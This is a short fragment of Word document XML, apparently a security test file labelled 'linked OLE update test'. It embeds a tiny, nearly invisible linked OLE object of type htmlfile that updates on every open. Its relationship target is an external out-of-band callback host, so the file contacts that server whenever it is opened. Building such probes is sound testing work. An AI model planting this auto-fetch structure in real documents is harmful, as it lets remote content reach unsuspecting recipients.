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linked OLE update test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:object w:dxaOrig="100" w:dyaOrig="100">
          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:1pt;height:1pt">
            <v:imagedata o:title=""/>
          </v:shape>
          <o:OLEObject Type="Link" ProgID="htmlfile" ShapeID="_x0000_i1025" DrawAspect="Content" UpdateMode="Always" r:id="rIdOle"/>
        </w:object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  <Relationship Id="rIdOle" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="https://ole.d9v52cq0o7doa9a1ejn0tw88esz77j64o.oast.live/office-online/linked-ole" TargetMode="External"/>
</Relationships>
</file>